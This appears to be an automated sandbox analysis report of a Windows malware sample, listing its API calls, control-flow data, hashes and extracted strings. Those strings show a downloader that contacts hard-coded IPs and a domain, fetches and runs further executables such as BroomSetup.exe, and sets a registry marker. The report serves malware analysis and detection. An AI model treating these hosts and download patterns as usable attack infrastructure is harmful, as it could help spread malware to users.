Execution Coverage: 5.2%
Dynamic/Decrypted Code Coverage: 2.5%
Signature Coverage: 0%
Total number of Nodes: 1106
Total number of Limit Nodes: 15
                                                                                                                                                                                                                                  execution_graph 44526 5ce003c 44527 5ce0049 44526->44527 44541 5ce0e0f SetErrorMode SetErrorMode 44527->44541 44532 5ce0265 44533 5ce02ce VirtualProtect 44532->44533 44535 5ce030b 44533->44535 44534 5ce0439 VirtualFree 44539 5ce05f4 LoadLibraryA 44534->44539 44540 5ce04be 44534->44540 44535->44534 44536 5ce04e3 LoadLibraryA 44536->44540 44538 5ce08c7 44539->44538 44540->44536 44540->44539 44542 5ce0223 44541->44542 44543 5ce0d90 44542->44543 44544 5ce0dad 44543->44544 44545 5ce0dbb GetPEB 44544->44545 44546 5ce0238 VirtualAlloc 44544->44546 44545->44546 44546->44532 44547 408273 44548 40828f 44547->44548 44549 4082ce 44548->44549 44552 40831c std::_Xfsopen 29 API calls 44548->44552 44556 4082db 44548->44556 44554 4082d5 44549->44554 44557 40831c 44549->44557 44552->44549 44554->44556 44563 40e228 44554->44563 44576 411d32 44557->44576 44559 4082ee 44559->44556 44560 4106ef 44559->44560 44637 41049b 44560->44637 44562 410705 44562->44554 44564 40e234 BuildCatchObjectHelperInternal 44563->44564 44565 40e245 44564->44565 44566 40e25a 44564->44566 44735 412381 20 API calls _abort 44565->44735 44575 40e255 std::_Xfsopen _Xfiopen 44566->44575 44718 40e81d EnterCriticalSection 44566->44718 44568 40e24a 44736 410905 26 API calls _Deallocate 44568->44736 44571 40e276 44719 40e1b2 44571->44719 44573 40e281 44737 40e29e LeaveCriticalSection __fread_nolock 44573->44737 44575->44556 44578 411c71 BuildCatchObjectHelperInternal 44576->44578 44577 411c8b 44601 412381 20 API calls _abort 44577->44601 44578->44577 44581 411cb8 44578->44581 44580 411c90 44602 410905 26 API calls _Deallocate 44580->44602 44582 411cca 44581->44582 44583 411cbd 44581->44583 44593 416499 44582->44593 44603 412381 20 API calls _abort 44583->44603 44587 411cd3 44588 411ce7 
std::_Xfsopen 44587->44588 44589 411cda 44587->44589 44605 411d1b LeaveCriticalSection __fread_nolock _Xfiopen 44588->44605 44604 412381 20 API calls _abort 44589->44604 44590 411c9b std::_Xfsopen 44590->44559 44594 4164a5 BuildCatchObjectHelperInternal 44593->44594 44606 411a06 EnterCriticalSection 44594->44606 44596 4164b3 44607 416533 44596->44607 44600 4164e4 std::_Xfsopen 44600->44587 44601->44580 44602->44590 44603->44590 44604->44590 44605->44590 44606->44596 44616 416556 44607->44616 44608 4164c0 44621 4164ef 44608->44621 44609 4165af 44626 41704e 20 API calls 3 library calls 44609->44626 44611 4165b8 44627 41629a 44611->44627 44614 4165c1 44614->44608 44633 4175b5 11 API calls 2 library calls 44614->44633 44616->44608 44616->44609 44624 40e81d EnterCriticalSection 44616->44624 44625 40e831 LeaveCriticalSection 44616->44625 44618 4165e0 44634 40e81d EnterCriticalSection 44618->44634 44620 4165f3 44620->44608 44636 411a4e LeaveCriticalSection 44621->44636 44623 4164f6 44623->44600 44624->44616 44625->44616 44626->44611 44628 4162ce _free 44627->44628 44629 4162a5 RtlFreeHeap 44627->44629 44628->44614 44629->44628 44630 4162ba 44629->44630 44635 412381 20 API calls _abort 44630->44635 44632 4162c0 GetLastError 44632->44628 44633->44618 44634->44620 44635->44632 44636->44623 44641 4104a7 BuildCatchObjectHelperInternal 44637->44641 44638 4104b3 44662 412381 20 API calls _abort 44638->44662 44640 4104d9 44650 40e81d EnterCriticalSection 44640->44650 44641->44638 44641->44640 44642 4104b8 44663 410905 26 API calls _Deallocate 44642->44663 44644 4104e5 44651 4105fb 44644->44651 44647 4104c3 std::_Xfsopen 44647->44562 44648 4104f9 44664 410518 LeaveCriticalSection __fread_nolock 44648->44664 44650->44644 44652 41061d 44651->44652 44653 41060d 44651->44653 44665 410522 44652->44665 44678 412381 20 API calls _abort 44653->44678 44656 410612 44656->44648 44657 4106bf 44657->44648 44658 410640 _Xfiopen 44658->44657 44669 40dfcb 44658->44669 44662->44642 44663->44647 
44664->44647 44666 41052e _Xfiopen 44665->44666 44667 410535 44665->44667 44666->44658 44667->44666 44668 419800 _Xfiopen 28 API calls 44667->44668 44668->44666 44670 40dfe3 44669->44670 44671 40dfdf 44669->44671 44670->44671 44679 4154e8 44670->44679 44675 419800 44671->44675 44673 40e003 44686 415fa3 62 API calls 7 library calls 44673->44686 44689 419767 44675->44689 44678->44656 44680 4154f4 44679->44680 44681 415509 44679->44681 44687 412381 20 API calls _abort 44680->44687 44681->44673 44683 4154f9 44688 410905 26 API calls _Deallocate 44683->44688 44685 415504 44685->44673 44686->44671 44687->44683 44688->44685 44698 41e97a 44689->44698 44691 419779 44692 419781 44691->44692 44693 419792 SetFilePointerEx 44691->44693 44711 412381 20 API calls _abort 44692->44711 44695 4197aa GetLastError 44693->44695 44697 419786 44693->44697 44712 41234b 20 API calls 3 library calls 44695->44712 44697->44657 44699 41e987 44698->44699 44700 41e99c 44698->44700 44713 41236e 20 API calls _abort 44699->44713 44705 41e9c1 44700->44705 44715 41236e 20 API calls _abort 44700->44715 44703 41e98c 44714 412381 20 API calls _abort 44703->44714 44705->44691 44706 41e9cc 44716 412381 20 API calls _abort 44706->44716 44707 41e994 44707->44691 44709 41e9d4 44717 410905 26 API calls _Deallocate 44709->44717 44711->44697 44712->44697 44713->44703 44714->44707 44715->44706 44716->44709 44717->44707 44718->44571 44720 40e1d4 44719->44720 44721 40e1bf 44719->44721 44724 40dfcb _Xfiopen 62 API calls 44720->44724 44726 40e1cf _Xfiopen 44720->44726 44757 412381 20 API calls _abort 44721->44757 44723 40e1c4 44758 410905 26 API calls _Deallocate 44723->44758 44727 40e1e8 44724->44727 44726->44573 44738 4165f6 44727->44738 44730 4154e8 _Xfiopen 26 API calls 44731 40e1f6 44730->44731 44742 41637e 44731->44742 44734 41629a _free 20 API calls 44734->44726 44735->44568 44736->44575 44737->44575 44739 40e1f0 44738->44739 44740 41660c 44738->44740 44739->44730 44740->44739 44741 41629a _free 20 API calls 
44740->44741 44741->44739 44743 4163a2 44742->44743 44744 41638d 44742->44744 44745 4163dd 44743->44745 44749 4163c9 44743->44749 44762 41236e 20 API calls _abort 44744->44762 44764 41236e 20 API calls _abort 44745->44764 44748 416392 44763 412381 20 API calls _abort 44748->44763 44759 416356 44749->44759 44750 4163e2 44765 412381 20 API calls _abort 44750->44765 44754 4163ea 44766 410905 26 API calls _Deallocate 44754->44766 44755 40e1fc 44755->44726 44755->44734 44757->44723 44758->44726 44767 4162d4 44759->44767 44761 41637a 44761->44755 44762->44748 44763->44755 44764->44750 44765->44754 44766->44755 44768 4162e0 BuildCatchObjectHelperInternal 44767->44768 44778 41e6fd EnterCriticalSection 44768->44778 44770 4162ee 44771 416320 44770->44771 44772 416315 44770->44772 44794 412381 20 API calls _abort 44771->44794 44779 4163fd 44772->44779 44775 41631b 44795 41634a LeaveCriticalSection __wsopen_s 44775->44795 44777 41633d std::_Xfsopen 44777->44761 44778->44770 44780 41e97a __wsopen_s 26 API calls 44779->44780 44782 41640d 44780->44782 44781 416413 44796 41e8e9 21 API calls 3 library calls 44781->44796 44782->44781 44784 416445 44782->44784 44785 41e97a __wsopen_s 26 API calls 44782->44785 44784->44781 44786 41e97a __wsopen_s 26 API calls 44784->44786 44788 41643c 44785->44788 44789 416451 FindCloseChangeNotification 44786->44789 44787 41646b 44790 41648d 44787->44790 44797 41234b 20 API calls 3 library calls 44787->44797 44791 41e97a __wsopen_s 26 API calls 44788->44791 44789->44781 44792 41645d GetLastError 44789->44792 44790->44775 44791->44784 44792->44781 44794->44775 44795->44777 44796->44787 44797->44790 44798 416ec2 44799 416ecf 44798->44799 44803 416ee7 44798->44803 44848 412381 20 API calls _abort 44799->44848 44801 416ed4 44849 410905 26 API calls _Deallocate 44801->44849 44804 416f42 44803->44804 44812 416edf 44803->44812 44850 418c55 21 API calls 2 library calls 44803->44850 44806 4154e8 _Xfiopen 26 API calls 44804->44806 44807 416f5a 44806->44807 
44818 41919a 44807->44818 44809 416f61 44810 4154e8 _Xfiopen 26 API calls 44809->44810 44809->44812 44811 416f8d 44810->44811 44811->44812 44813 4154e8 _Xfiopen 26 API calls 44811->44813 44814 416f9b 44813->44814 44814->44812 44815 4154e8 _Xfiopen 26 API calls 44814->44815 44816 416fab 44815->44816 44817 4154e8 _Xfiopen 26 API calls 44816->44817 44817->44812 44819 4191a6 BuildCatchObjectHelperInternal 44818->44819 44820 4191ae 44819->44820 44823 4191c6 44819->44823 44917 41236e 20 API calls _abort 44820->44917 44822 41928c 44924 41236e 20 API calls _abort 44822->44924 44823->44822 44828 4191ff 44823->44828 44825 4191b3 44918 412381 20 API calls _abort 44825->44918 44826 419291 44925 412381 20 API calls _abort 44826->44925 44830 419223 44828->44830 44831 41920e 44828->44831 44851 41e6fd EnterCriticalSection 44830->44851 44919 41236e 20 API calls _abort 44831->44919 44833 41921b 44926 410905 26 API calls _Deallocate 44833->44926 44835 419229 44838 419245 44835->44838 44839 41925a 44835->44839 44836 419213 44920 412381 20 API calls _abort 44836->44920 44921 412381 20 API calls _abort 44838->44921 44852 4192ad 44839->44852 44841 4191bb std::_Xfsopen 44841->44809 44844 41924a 44922 41236e 20 API calls _abort 44844->44922 44845 419255 44923 419284 LeaveCriticalSection __wsopen_s 44845->44923 44848->44801 44849->44812 44850->44804 44851->44835 44853 4192d7 44852->44853 44854 4192bf 44852->44854 44856 419641 44853->44856 44861 41931c 44853->44861 44936 41236e 20 API calls _abort 44854->44936 44957 41236e 20 API calls _abort 44856->44957 44857 4192c4 44937 412381 20 API calls _abort 44857->44937 44860 419646 44958 412381 20 API calls _abort 44860->44958 44862 4192cc 44861->44862 44864 419327 44861->44864 44869 419357 44861->44869 44862->44845 44938 41236e 20 API calls _abort 44864->44938 44865 419334 44959 410905 26 API calls _Deallocate 44865->44959 44867 41932c 44939 412381 20 API calls _abort 44867->44939 44871 419370 44869->44871 44872 4193b2 44869->44872 44873 419396 
44869->44873 44871->44873 44905 41937d 44871->44905 44943 417a45 44872->44943 44940 41236e 20 API calls _abort 44873->44940 44876 41939b 44941 412381 20 API calls _abort 44876->44941 44880 41629a _free 20 API calls 44883 4193d2 44880->44883 44881 41951b 44884 419591 44881->44884 44886 419534 GetConsoleMode 44881->44886 44882 4193a2 44942 410905 26 API calls _Deallocate 44882->44942 44887 41629a _free 20 API calls 44883->44887 44888 419595 ReadFile 44884->44888 44886->44884 44889 419545 44886->44889 44890 4193d9 44887->44890 44891 419609 GetLastError 44888->44891 44892 4195af 44888->44892 44889->44888 44893 41954b ReadConsoleW 44889->44893 44894 4193e3 44890->44894 44895 4193fe 44890->44895 44896 419616 44891->44896 44897 41956d 44891->44897 44892->44891 44898 419586 44892->44898 44893->44898 44900 419567 GetLastError 44893->44900 44950 412381 20 API calls _abort 44894->44950 44899 419800 _Xfiopen 28 API calls 44895->44899 44955 412381 20 API calls _abort 44896->44955 44914 4193ad __fread_nolock 44897->44914 44952 41234b 20 API calls 3 library calls 44897->44952 44909 4195d4 44898->44909 44910 4195eb 44898->44910 44898->44914 44899->44905 44900->44897 44901 41629a _free 20 API calls 44901->44862 44904 41961b 44956 41236e 20 API calls _abort 44904->44956 44927 421229 44905->44927 44907 4193e8 44951 41236e 20 API calls _abort 44907->44951 44953 418fc9 31 API calls 4 library calls 44909->44953 44913 419602 44910->44913 44910->44914 44954 418e09 29 API calls _Xfiopen 44913->44954 44914->44901 44916 419607 44916->44914 44917->44825 44918->44841 44919->44836 44920->44833 44921->44844 44922->44845 44923->44841 44924->44826 44925->44833 44926->44841 44928 421236 44927->44928 44930 421243 44927->44930 44960 412381 20 API calls _abort 44928->44960 44932 42124f 44930->44932 44961 412381 20 API calls _abort 44930->44961 44931 42123b 44931->44881 44932->44881 44934 421270 44962 410905 26 API calls _Deallocate 44934->44962 44936->44857 44937->44862 44938->44867 44939->44865 
[Call graph residue from the interactive viewer: the node ids and edge list (for example 44940->44876) are omitted. Windows APIs named by graph nodes, in order of appearance: RtlAllocateHeap, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetModuleFileNameA, CreateFileA, WriteFile, FindCloseChangeNotification, GetTempPathA, ShellExecuteExA, WaitForSingleObject, CloseHandle, WSAStartup, WSACleanup, socket, gethostbyname, htons, connect, send, recv, closesocket, RegCreateKeyExA, RegSetValueExA, RegCloseKey, RaiseException, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, ExitProcess, MultiByteToWideChar, GetLastError, CreateFileW, GetFileType, CreateToolhelp32Snapshot, Module32First, VirtualAlloc. C runtime and STL helpers also appear as node labels (_abort, _Deallocate, _Xfiopen, __fread_nolock, __wsopen_s, std::_Locinfo::_Locinfo_ctor, std::locale::_Init, std::_Facet_Register, std::ios_base::_Ios_base_dtor, CatchGuardHandler, BuildCatchObjectHelperInternal, ___scrt_fastfail).]

Control-flow Graph

[Interactive graph residue: the Executed / Not Executed colour legend and the basic-block list for the function at 424b3e (blocks spanning 424b3e-425e3b) are omitted. In that block list GetModuleFileNameA is the only Windows API called directly; every other call targets an internal subroutine (for example 403491, 40197c, 401b1e, 426504, 426217, 426260, 42612f, 425ee2, 4034e3, 40356f, 410c91, 42631a, 40ff7e, 4019f8).]
APIs
  • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
  • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
  • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
• String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
• API String ID: 2531350358-4166474000
• Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
• Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
• Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
• Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Graph data for the function starting at 4139e7 omitted (residue of the rendered control-flow graph); the APIs it calls are listed below.
APIs
• GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
• TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
• ExitProcess.KERNEL32 ref: 00413A21
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
• Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
• Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
• Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Graph data for the function starting at 426504 omitted (residue of the rendered control-flow graph); the WinSock APIs and HTTP strings it references are listed below.
APIs
• __EH_prolog.LIBCMT ref: 00426509
• WSAStartup.WS2_32(00000202,?), ref: 00427195
• socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
• WSACleanup.WS2_32 ref: 004271C5
• gethostbyname.WS2_32(00000000), ref: 004271D9
• htons.WS2_32(?), ref: 0042720B
• connect.WS2_32(00000000,?,00000010), ref: 0042721C
• send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
• send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
• recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
• recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
• recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
• recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
• recv.WS2_32(00000000,?,?,00000000), ref: 00427540
• WSACleanup.WS2_32 ref: 0042757E
• closesocket.WS2_32(?), ref: 00427585
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
• String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
• API String ID: 791229064-3676584321
• Opcode ID: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
• Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
• Opcode Fuzzy Hash: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
• Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Graph data for the function starting at 41a36b omitted (residue of the rendered control-flow graph); the file-handling APIs it calls are listed below.
APIs
  • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
• GetLastError.KERNEL32 ref: 0041A47F
• __dosmaperr.LIBCMT ref: 0041A486
• GetFileType.KERNEL32(00000000), ref: 0041A492
• GetLastError.KERNEL32 ref: 0041A49C
• __dosmaperr.LIBCMT ref: 0041A4A5
• CloseHandle.KERNEL32(00000000), ref: 0041A4C5
• CloseHandle.KERNEL32(?), ref: 0041A60F
• GetLastError.KERNEL32 ref: 0041A641
• __dosmaperr.LIBCMT ref: 0041A648
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
• Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
• Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
• Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05CE024D
Strings
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 6e33f2bdf11782594fc291cf2c14e660577c23c133270754904d3307328a13c3
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: C5527974A01229DFDB64CF68C984BACBBB1BF09304F1484D9E84DAB351DB70AA85CF54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• __EH_prolog.LIBCMT ref: 00426134
• RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
• RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
• RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: CloseCreateH_prologValue
• String ID: Installed$SOFTWARE\BroomCleaner
• API String ID: 1996196666-529226407
• Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
• Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
• Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
• Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: CloseExecuteHandleObjectShellSingleWait
• String ID: /BroomSetup.exe
• API String ID: 3837156514-1897133622
• Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
• Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
• Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
• Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1655 4163fd-416411 call 41e97a 1658 416413-416415 1655->1658 1659 416417-41641f 1655->1659 1660 416465-416485 call 41e8e9 1658->1660 1661 416421-416428 1659->1661 1662 41642a-41642d 1659->1662 1672 416493 1660->1672 1673 416487-416491 call 41234b 1660->1673 1661->1662 1664 416435-416449 call 41e97a * 2 1661->1664 1665 41644b-41645b call 41e97a FindCloseChangeNotification 1662->1665 1666 41642f-416433 1662->1666 1664->1658 1664->1665 1665->1658 1675 41645d-416463 GetLastError 1665->1675 1666->1664 1666->1665 1677 416495-416498 1672->1677 1673->1677 1675->1660
APIs
• FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
• GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
• __dosmaperr.LIBCMT ref: 00416488
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification__dosmaperr
• String ID:
• API String ID: 490808831-0
• Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
• Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
• Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
• Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1680 419767-41977f call 41e97a 1683 419781-419786 call 412381 1680->1683 1684 419792-4197a8 SetFilePointerEx 1680->1684 1691 41978c-419790 1683->1691 1686 4197b9-4197c3 1684->1686 1687 4197aa-4197b7 GetLastError call 41234b 1684->1687 1690 4197c5-4197da 1686->1690 1686->1691 1687->1691 1692 4197df-4197e4 1690->1692 1691->1692
APIs
• SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
• GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
• __dosmaperr.LIBCMT ref: 004197B1
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
• Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
• Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
• Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1694 426217-42623c CreateFileA 1695 426259-42625f 1694->1695 1696 42623e-426253 WriteFile FindCloseChangeNotification 1694->1696 1696->1695
APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
